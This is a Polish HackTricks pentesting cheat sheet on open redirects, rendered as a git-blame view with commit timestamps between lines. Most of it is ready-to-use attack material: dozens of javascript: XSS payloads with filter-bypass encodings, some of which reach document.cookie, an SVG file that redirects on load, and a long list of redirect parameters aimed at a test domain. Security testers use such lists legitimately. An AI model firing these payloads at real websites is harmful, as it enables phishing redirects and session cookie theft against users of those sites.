2024-05-14 11:14:54 +00:00
# Przekierowanie otwarte
2022-04-28 16:01:33 +00:00
< details >
2024-02-11 01:46:25 +00:00
< summary > < strong > Naucz się hakować AWS od zera do bohatera z< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-11 01:46:25 +00:00
Inne sposoby wsparcia HackTricks:
2022-04-28 16:01:33 +00:00
2024-05-14 11:14:54 +00:00
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF** , sprawdź [**PLANY SUBSKRYPCYJNE** ](https://github.com/sponsors/carlospolop )!
2024-02-11 01:46:25 +00:00
* Zdobądź [**oficjalne gadżety PEASS & HackTricks** ](https://peass.creator-spring.com )
* Odkryj [**Rodzinę PEASS** ](https://opensea.io/collection/the-peass-family ), naszą kolekcję ekskluzywnych [**NFT** ](https://opensea.io/collection/the-peass-family )
2024-05-14 11:14:54 +00:00
* **Dołącz do** 💬 [**grupy Discord** ](https://discord.gg/hRep4RUj7f ) lub [**grupy telegramowej** ](https://t.me/peass ) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) i [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) repozytoriów na GitHubie.
2022-04-28 16:01:33 +00:00
< / details >
2024-05-14 11:14:54 +00:00
## Przekierowanie otwarte
2022-04-28 16:01:33 +00:00
2024-05-14 11:14:54 +00:00
### Przekierowanie do localhosta lub dowolnych domen
2020-07-15 15:43:14 +00:00
2022-02-13 12:30:13 +00:00
{% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %}
[url-format-bypass.md ](ssrf-server-side-request-forgery/url-format-bypass.md )
{% endcontent-ref %}
2020-07-15 15:43:14 +00:00
2024-05-14 11:14:54 +00:00
### Otwarte przekierowanie do XSS
2020-07-15 15:43:14 +00:00
```bash
#Basic payload, javascript code is executed after "javascript:"
javascript:alert(1)
#Bypass "javascript" word filter with CRLF
java%0d%0ascript%0d%0a:alert(0)
2024-05-14 11:14:54 +00:00
# Abuse bad subdomain filter
javascript://sub.domain.com/%0Aalert(1)
2020-07-15 15:43:14 +00:00
#Javascript with "://" (Notice that in JS "//" is a line coment, so new line is created before the payload). URL double encoding is needed
#This bypasses FILTER_VALIDATE_URL os PHP
javascript://%250Aalert(1)
#Variation of "javascript://" bypass when a query is also needed (using comments or ternary operator)
javascript://%250Aalert(1)//?1
javascript://%250A1?alert(1):0
#Others
%09Jav%09ascript:alert(document.domain)
javascript://%250Alert(document.location=document.cookie)
/%09/javascript:alert(1);
/%09/javascript:alert(1)
//%5cjavascript:alert(1);
//%5cjavascript:alert(1)
/%5cjavascript:alert(1);
/%5cjavascript:alert(1)
javascript://%0aalert(1)
< >javascript:alert(1);
//javascript:alert(1);
//javascript:alert(1)
/javascript:alert(1);
/javascript:alert(1)
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1);
javascript:alert(1)
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:confirm(1)
javascript://https://whitelisted.com/?z=%0Aalert(1)
javascript:prompt(1)
jaVAscript://whitelisted.com//%0d%0aalert(1);//
javascript://whitelisted.com?%a0alert%281%29
/x:1/:///%01javascript:alert(document.cookie)/
";alert(0);//
```
2024-05-14 11:14:54 +00:00
## Przekierowanie otwarte przesyłanie plików svg
2020-12-01 10:55:31 +00:00
```markup
2020-07-15 15:43:14 +00:00
< code >
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
< svg
onload="window.location='http://www.example.com'"
xmlns="http://www.w3.org/2000/svg">
< / svg >
< / code >
```
2024-05-14 11:14:54 +00:00
## Wspólne parametry wstrzykiwania
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}
success=https://c1h2e1.github.io
data=https://c1h2e1.github.io
qurl=https://c1h2e1.github.io
login=https://c1h2e1.github.io
logout=https://c1h2e1.github.io
ext=https://c1h2e1.github.io
clickurl=https://c1h2e1.github.io
goto=https://c1h2e1.github.io
rit_url=https://c1h2e1.github.io
forward_url=https://c1h2e1.github.io
@https://c1h2e1 .github.io
forward=https://c1h2e1.github.io
pic=https://c1h2e1.github.io
callback_url=https://c1h2e1.github.io
jump=https://c1h2e1.github.io
jump_url=https://c1h2e1.github.io
click?u=https://c1h2e1.github.io
originUrl=https://c1h2e1.github.io
origin=https://c1h2e1.github.io
Url=https://c1h2e1.github.io
desturl=https://c1h2e1.github.io
u=https://c1h2e1.github.io
page=https://c1h2e1.github.io
u1=https://c1h2e1.github.io
action=https://c1h2e1.github.io
action_url=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
sp_url=https://c1h2e1.github.io
service=https://c1h2e1.github.io
recurl=https://c1h2e1.github.io
j?url=https://c1h2e1.github.io
url=//https://c1h2e1.github.io
uri=https://c1h2e1.github.io
u=https://c1h2e1.github.io
allinurl:https://c1h2e1.github.io
q=https://c1h2e1.github.io
link=https://c1h2e1.github.io
src=https://c1h2e1.github.io
tc?src=https://c1h2e1.github.io
linkAddress=https://c1h2e1.github.io
location=https://c1h2e1.github.io
burl=https://c1h2e1.github.io
request=https://c1h2e1.github.io
backurl=https://c1h2e1.github.io
RedirectUrl=https://c1h2e1.github.io
Redirect=https://c1h2e1.github.io
ReturnUrl=https://c1h2e1.github.io
```
2024-05-14 11:14:54 +00:00
## Przykłady kodu
2020-10-22 09:33:22 +00:00
2024-05-14 11:14:54 +00:00
#### .Net
2020-10-22 09:33:22 +00:00
```bash
response.redirect("~/mysafe-subdomain/login.aspx")
```
2024-05-14 11:14:54 +00:00
#### Java
2020-10-22 09:33:22 +00:00
```bash
response.redirect("http://mysafedomain.com");
```
2024-05-14 11:14:54 +00:00
#### PHP
2020-10-22 09:33:22 +00:00
```php
< ?php
/* browser redirections*/
header("Location: http://mysafedomain.com");
exit;
?>
```
2024-05-14 11:14:54 +00:00
## Narzędzia
2020-07-29 09:22:22 +00:00
* [https://github.com/0xNanda/Oralyzer ](https://github.com/0xNanda/Oralyzer )
2024-05-14 11:14:54 +00:00
## Zasoby
2020-07-15 15:43:14 +00:00
2024-05-14 11:14:54 +00:00
* W [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect ) znajdziesz listy fuzzingowe.\\
* [https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html ](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html )\\
2024-02-06 03:10:38 +00:00
* [https://github.com/cujanovic/Open-Redirect-Payloads ](https://github.com/cujanovic/Open-Redirect-Payloads )
* [https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a ](https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a )
2022-04-28 16:01:33 +00:00
< details >
2024-02-11 01:46:25 +00:00
< summary > < strong > Naucz się hakować AWS od zera do bohatera z< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-11 01:46:25 +00:00
Inne sposoby wsparcia HackTricks:
2022-04-28 16:01:33 +00:00
2024-05-14 11:14:54 +00:00
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF** , sprawdź [**PLANY SUBSKRYPCYJNE** ](https://github.com/sponsors/carlospolop )!
2024-02-11 01:46:25 +00:00
* Zdobądź [**oficjalne gadżety PEASS & HackTricks** ](https://peass.creator-spring.com )
* Odkryj [**Rodzinę PEASS** ](https://opensea.io/collection/the-peass-family ), naszą kolekcję ekskluzywnych [**NFT** ](https://opensea.io/collection/the-peass-family )
2024-05-14 11:14:54 +00:00
* **Dołącz do** 💬 [**grupy Discord** ](https://discord.gg/hRep4RUj7f ) lub [**grupy telegramowej** ](https://t.me/peass ) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) i [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) na GitHubie.
2022-04-28 16:01:33 +00:00
< / details >